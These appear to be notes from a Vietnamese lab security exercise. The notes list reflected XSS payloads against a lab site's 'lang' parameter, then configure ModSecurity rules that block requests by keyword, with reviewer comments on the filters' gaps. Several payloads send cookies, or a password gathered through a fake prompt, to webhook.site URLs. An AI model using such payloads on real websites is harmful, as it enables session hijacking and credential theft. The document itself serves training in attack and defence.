- <script>alert(1)</script>
- ');alert(1);//
- http://gplx.teamxx.dientap.cnsc/hoidap.html?lang=');document.write('<h1>Xin chao DHQG 2019</h1>')//
- http://gplx.teamxx.dientap.cnsc/hoidap.html?lang=');var pass =prompt("Nhập mật khẩu để tiếp tục", "password");document.write('<img src="https://webhook.site/448dcf26-0d84-4e49-9ffa-940fdb861553?pass='%2Bpass%2B'">')//
- http://gplx.teamxx.dientap.cnsc/hoidap.html?lang=');document.getElementsByClassName('path')[0].innerHTML='<img src="https://www.switch.ch/export/sites/default/security/.galleries/images/Hack-the-Hacker-photo-by-istockphoto-gorodenkoff.jpg">'//
- http://gplx.teamxx.dientap.cnsc/hoidap.html?lang=');document.write('<img src="https://webhook.site/448dcf26-0d84-4e49-9ffa-940fdb861553?cookie'%2Bdocument.cookie%2B'">')//
- <script>window.location="http://webhook.site/80aeac02-68fc-46b8-82fc-71910f4e110f?"+document.cookie</script>
- sudo nano /usr/share/modsecurity-crs/new_rules/modsecurity_xssurl.conf
- # Rule file for the lab WAF: enables the ModSecurity engine and denies any
- # request whose URI matches a fixed keyword list.
- <IfModule security2_module>
- # Engine in blocking mode: matching rules act on the request, not just log it.
- SecRuleEngine On
- # NOTE(review): these defaults are declared for phase 2, while the rule below
- # runs in phase 1 and spells out its own deny/log actions; confirm which
- # defaults it actually inherits.
- SecDefaultAction "phase:2,deny,log,status:403"
- # Keyword blacklist on the request URI (rule id 10000, logged and denied).
- # NOTE(review): the pattern is matched case-sensitively and no transformation
- # is listed, so differently cased input is not covered; confirm whether
- # URL-encoded input is normalised before matching (t:lowercase and
- # t:urlDecodeUni make both explicit).
- # Broad words such as "document" or "window" will also block legitimate URLs
- # that merely contain them, so review modsec_audit.log for false positives.
- # A keyword filter is a stopgap; the durable fix is context-aware output
- # encoding of the reflected parameter in the application itself.
- SecRule REQUEST_URI "Jscript|alert|onerror|document|javascript|script|window" "deny,phase:1,log,id:10000"
- </IfModule>
- cd /usr/share/modsecurity-crs/activated_rules
- sudo ln -s ../new_rules/modsecurity_xssurl.conf
- sudo service apache2 restart
- cat /var/log/apache2/modsec_audit.log
- cd /usr/share/modsecurity-crs/
- sudo nano /usr/share/modsecurity-crs/new_rules/modsecurity_xss_body.conf
- # Rule file for the lab WAF: enables the ModSecurity engine and denies any
- # request whose body matches a fixed keyword list.
- <IfModule security2_module>
- # Engine in blocking mode: matching rules act on the request, not just log it.
- SecRuleEngine On
- # Defaults for phase 2 rules: deny with HTTP 403 and log the match.
- SecDefaultAction "phase:2,deny,log,status:403"
- # Keyword blacklist on the raw request body (rule id 10001), evaluated in
- # phase 2, logged and denied.
- # NOTE(review): REQUEST_BODY is only populated when request body buffering is
- # enabled (SecRequestBodyAccess On); confirm that in the main configuration,
- # otherwise this rule never sees any data.
- # NOTE(review): the pattern is matched case-sensitively and no transformation
- # is listed, so differently cased or encoded input is not covered; consider
- # t:lowercase, t:urlDecodeUni and t:htmlEntityDecode, and matching ARGS for
- # form submissions rather than the raw body.
- # Broad words such as "document" or "script" will also reject ordinary form
- # text that contains them, so review modsec_audit.log for false positives.
- # A keyword filter is a stopgap; the durable fix is output encoding in the
- # application plus a Content-Security-Policy.
- SecRule REQUEST_BODY "Jscript|alert|onerror|document|javascript|script|window" "deny,phase:2,log,id:10001"
- </IfModule>
- cd /usr/share/modsecurity-crs/activated_rules
- sudo ln -s ../new_rules/modsecurity_xss_body.conf
- sudo service apache2 restart
- cat /var/log/apache2/modsec_audit.log